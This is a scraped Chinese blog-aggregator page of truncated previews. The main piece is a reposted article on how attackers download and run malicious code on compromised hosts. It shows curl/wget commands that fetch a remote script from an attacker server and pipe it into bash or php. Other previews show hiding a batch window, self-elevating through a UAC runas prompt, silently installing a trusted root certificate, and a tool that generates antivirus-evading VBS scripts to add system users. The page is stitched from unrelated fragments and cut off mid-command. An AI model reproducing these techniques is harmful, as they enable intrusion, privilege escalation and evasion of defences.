w-script

通过命令下载执行恶意代码的几种姿势

送分小仙女□ 提交于 2020-09-29 15:29:00
本文转载自微信公众号「Bypass」,作者Bypass。转载本文请联系Bypass公众号。 在 过程中, 者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。 在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。 一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。 方式1:curl -fsSL http://192.168.99.19:8080/test.sh | bash 方式2:bash < <( curl http://192.168.99.19:8080/test.sh ) 02、wget 执行wget命令远程下载恶意程序。 方式1:wget -q -O- http://192.168.99.19:8080/test.sh | bash 方式2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php curl+wget合并,实现无文件远程恶意代码执行。 bash -c '(curl -fsSL http://192

在windows条件,Ping加上时间戳,并保存到文件

≯℡__Kan透↙ 提交于 2020-08-14 02:37:55
在windows条件,Ping加上时间戳,并保存到文件 转载: http://blog.csdn.net/byply/article/details/50628403 1、在D盘新建“ping.vbs” 文件,输入如下代码: Dim args, flag, unsuccOut args="" otherout="" flag=0 If WScript.Arguments.count = 0 Then WScript.Echo "Usage: cscript tping.vbs [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]" WScript.Echo " [-s count] [[-j host-list] | [-k host-list]]" WScript.Echo " [-r count] [-w timeout] destination-list" wscript.quit End if For i=0 to WScript.Arguments.count - 1 args=args & " " & WScript.Arguments(i) Next Set shell = WScript.CreateObject("WScript.Shell") Set re=New RegExp re.Pattern="

使用WinHttpRequest伪造referer

梦想的初衷 提交于 2020-08-11 15:42:23
winhttprequest,使用WinHttpRequest伪造referer,winhttprequest示例代码,winhttprequest入门教程,winhttprequest高级使用教程 从msdn得知, WinHttp.WinHttpRequest.5.1 是 msxml 4.0 的底层对象,也就是说 XMLHTTP/ServerXMLHTTP 也是在它的基础上封装而来。用 WinHttpRequest 发的请求,连 Fiddler 也监测不到,看来确实是比较底层的东西。 既然可以用它来伪造所有 http 请求的 header,那 Cookies、Sessionid 自然也就可以得到并传递了。下面是实战代码,用命令行登录博客园,共三次请求,第一次请求获取表单的 VIEWSTATE 和 EVENTVALIDATION,第二次带账户登录,第三次带Cookie访问其首页: //封装成远程访问的函数 function RemoteCall(method, url, param, header){ var obj = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); obj.Open(method||"GET", url, false); obj.Option(4) = 13056; obj.Option(6) = false;

Window平台下的静默下载并安装软件脚本bat

半腔热情 提交于 2020-08-11 10:37:26
一,隐藏命令窗口 当我们运行bat脚本的时候,弹出CMD窗口。如果要隐藏窗口可以在bat脚本开头处写一下代码: @echo off if "%1" == "h" goto begin mshta vbscript:createobject ( "wscript.shell" ) .run ( "" "%~nx0" " h" ,0 ) ( window.close ) && exit :begin REM 二,以管理员身份运行 如何始终以管理员身份运行bat文件? 其实很简单,只需要新建一个bat文件,填入以下代码后运行即可: @echo off > nul 2 > & 1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" if '%errorlevel%' NEQ '0' ( goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^ ( "Shell.Application" ^ ) > "%temp%\getadmin.vbs" echo UAC.ShellExecute "%~s0" , "" , "" , "runas" , 1 >> "%temp%\getadmin.vbs" "

如何给软件加上一个数字签名——进阶版 自动信任数字签名

丶灬走出姿态 提交于 2020-08-08 13:53:00
多久没更新了??? 不知道,也没人Care嘛 (小声BB:今天不是更新了吗...) 咳咳,请忽视上面的内容。 本文将讲述数字签名的进阶方法——自动添加数字签名。 初衷:其实认真观察的童鞋们会发现,上一篇博文的信任的证书, 在别人的电脑上是不被信任的!!! 让别人手动信任? 熊孩子点了“否”怎么办? 干脆不信任了?数字签名意义何在? 这一期,就教大家来自动信任证书 (原理超简单的土办法,有大神请赐教) 成品图: OK,开始正片干货! 第一步 生成证书文件 注意:可以省去MMC部分的步骤,以模拟他人的电脑。 (具体怎么生成见上一期博文 https://www.cnblogs.com/Jimmy-X-MyCODE/p/12607756.html ,这里不再详细阐述。) 第二步 下载必备软件 必备软件有:CertMgr.exe,可以网上搜一下。 将CertMgr.exe放进一个文件夹内。 第三步 编写脚本 本脚本以VBS为脚本语言 Set Wshell = WScript.CreateObject( " WScript.Shell " ) Wshell.run " cmd.exe /c CertMgr.exe /c /add Jimmy.cer /s root " , 0 , false ' 运行cmd命令行,原理很简单,进行百度。 CertMgr.exe必须放在同一目录下,Jimmy

如何给软件加上一个数字签名——进阶版 自动信任数字签名

别说谁变了你拦得住时间么 提交于 2020-08-06 09:48:08
多久没更新了??? 不知道,也没人Care嘛 (小声BB:今天不是更新了吗...) 咳咳,请忽视上面的内容。 本文将讲述数字签名的进阶方法——自动添加数字签名。 初衷:其实认真观察的童鞋们会发现,上一篇博文的信任的证书, 在别人的电脑上是不被信任的!!! 让别人手动信任? 熊孩子点了“否”怎么办? 干脆不信任了?数字签名意义何在? 这一期,就教大家来自动信任证书 (原理超简单的土办法,有大神请赐教) 成品图: OK,开始正片干货! 第一步 生成证书文件 注意:可以省去MMC部分的步骤,以模拟他人的电脑。 (具体怎么生成见上一期博文 https://www.cnblogs.com/Jimmy-X-MyCODE/p/12607756.html ,这里不再详细阐述。) 第二步 下载必备软件 必备软件有:CertMgr.exe,可以网上搜一下。 将CertMgr.exe放进一个文件夹内。 第三步 编写脚本 本脚本以VBS为脚本语言 Set Wshell = WScript.CreateObject( " WScript.Shell " ) Wshell.run " cmd.exe /c CertMgr.exe /c /add Jimmy.cer /s root " , 0 , false ' 运行cmd命令行,原理很简单,进行百度。 CertMgr.exe必须放在同一目录下,Jimmy

Lodop实现打印功能

左心房为你撑大大i 提交于 2020-08-06 04:22:34
LodopFuncs.js: var CreatedOKLodop7766= null ; function getLodop(oOBJECT,oEMBED){ /* ************************* 本函数根据浏览器类型决定采用哪个页面元素作为Lodop对象: IE系列、IE内核系列的浏览器采用oOBJECT, 其它浏览器(Firefox系列、Chrome系列、Opera系列、Safari系列等)采用oEMBED, 如果页面没有相关对象元素,则新建一个或使用上次那个,避免重复生成。 64位浏览器指向64位的安装程序install_lodop64.exe。 ************************* */ var strHtmInstall="<br><font color='#FF00FF'>打印控件未安装!点击这里<a href='/install_lodop32.exe' target='_self'>执行安装</a>,安装后请刷新页面或重新进入。</font>" ; var strHtmUpdate="<br><font color='#FF00FF'>打印控件需要升级!点击这里<a href='/install_lodop32.exe' target='_self'>执行升级</a>,升级后请重新进入。</font>" ; var

selenium--上传文件、模拟键盘输入

走远了吗. 提交于 2020-08-05 16:47:20
上传文件 driver.get('https://tinypng.com/' ) #进入目标页面 driver.find_element_by_css_selector('.target .icon' ).click() #点击上传 time.sleep(1 ) #开始上传文件,利用windows直接敲键盘的原理 import win32com.client #调用相应库(此处为window库) shell=win32com.client.Dispatch("WScript.Shell" ) #调用shell的固定用法,不变照抄 shell.Sendkeys(r'd:\baidu.png'+'\n') #模拟键盘输入,并按回车 模拟键盘输入 import win32api import win32con win32api.keybd_event(win32con.VK_NUMPAD0,0 ) #按数字0 win32api.keybd_event(win32con.VK_RETURE,0 ) #按回车键 win32api.keybd_event(win32con.VK_SPACE,0 ) #按空格 win32api.keybd_event(win32con.VK_ADD,0) #按+号 来源: oschina 链接: https://my.oschina.net/u/4274162

Windows 2008 R2 远程桌面连接记录(客户端IP)

谁都会走 提交于 2020-05-05 20:45:42
一、激活Windows Server 2008 R2的终端服务器的方法。 1、Windows Server 2008 R2终端服务器的安装 1)、添加服务器角色,选择 远程桌面服务。 2)、勾选 远程桌面会话主机 和 远程桌面授权。 3)、选择 每用户 。 4)、同时 勾选如下配置项。 2、Windows Server 2008 R2终端服务器的激活 2.1)、激活终端服务器 3、Windows Server 2008 R2终端服务器的基本配置 有时,我们希望用户一关闭远程桌面,就会自动的结束掉会话,可以修改注册表: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] "MaxDisconnectionTime"=dword:000003e8 MaxDisconnectionTime 默认采用毫秒为单位,3e8就是1000毫秒,也就是1秒,当用户一关闭远程桌面时,会自动结束掉会话,其它用户再连接时,就不会串到已登陆用户的桌面。 二、 记录远程桌面的连接登录日志 1、 先建立存放日志的目录,如c:\RDP 2、 在其目录下建立一个名为RDPLog.bat的批处理文件,内容为:

[原创]IIS提权工具-VBS提权脚本免杀生成器

北慕城南 提交于 2020-04-28 03:48:15
[原创]添加系统用户 VBS提权脚本随机加密生成器[K.8] 2011-05-05 02:42:53 | 分类: 原创工具 VBS提权脚本随机加密生成器[K.8] Author: QQ吻 QQ:396890445 Team: Crack8_编程小组[K.8] Blog: http://qqhack8.blog.163.com 说明: 无net.exe、net1.exe提权,可以试试用这个vbs脚本添加系统用户,它通过WSCRIPT.NETWORK来添加用户 好处:1 防止某些人 从你提权后 忘了删除的脚本里 看到你已经提到的帐号和密码 当然懂解密也能看到 2 也许能躲过某些 对文件扫描 指定字符串的程序 (所谓杀软 和一些扫马一类的大马 程序等) 提示:C#写的程序 系统需装有.net 3.5 或以上才能使用本工具 否则 运行时会提示相应错误 https://github.com/k8gege/K8tools/blob/master/ K8_VBS提权脚本免杀生成器.rar 来源: oschina 链接: https://my.oschina.net/u/4292207/blog/3601023